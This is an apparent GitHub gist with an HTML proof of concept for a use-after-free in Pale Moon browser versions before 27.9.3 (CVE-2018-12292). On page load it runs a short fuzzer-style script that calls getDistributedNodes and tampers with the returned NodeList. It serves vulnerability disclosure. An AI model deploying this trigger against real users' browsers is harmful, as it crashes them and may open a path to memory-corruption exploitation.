@berkgoksel
Created June 13, 2018 15:12
Pale Moon Browser < 27.9.3 - Use After Free - Proof of Concept.html
<!-- PaleMoon Browser - Proof of Concept -->
<!-- Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free - Proof of Concept -->
<!-- Date: 13 Jun 2018 -->
<!-- Author - Berk Cem Goksel -->
<!-- Contact: twitter.com/berkcgoksel || bgoksel.com -->
<!-- Vendor Homepage: https://www.palemoon.org/ -->
<!-- Software Link: https://www.palemoon.org/palemoon-win32.shtml -->
<!-- Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2) -->
<!-- Tested on: Windows 10 -->
<!-- Category: Windows Remote Exploit -->
<!-- CVE : CVE-2018-12292 -->
<html>
<head>
<style>
</style>
<script>
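// Stores var_name on fuzzervars under the key var_type.
function SetVariable(fuzzervars, var_name, var_type) {
    fuzzervars[var_type] = var_name;
}
function jsfuzzer() {
    // var_2 resolves to the <content id="var_2"> element in the body (named access on window).
    // getDistributedNodes() is the Shadow DOM v0 API on <content>; it returns a NodeList.
    var var_1 = var_2.getDistributedNodes();
    // Called with two arguments, so var_type is undefined: this sets var_1["undefined"] = 'NodeList'.
    SetVariable(var_1, 'NodeList');
}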
</script>
</head>
<body onload=jsfuzzer()>
<!--beginhtml-->
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content>
<!--endhtml-->
</body>
</html>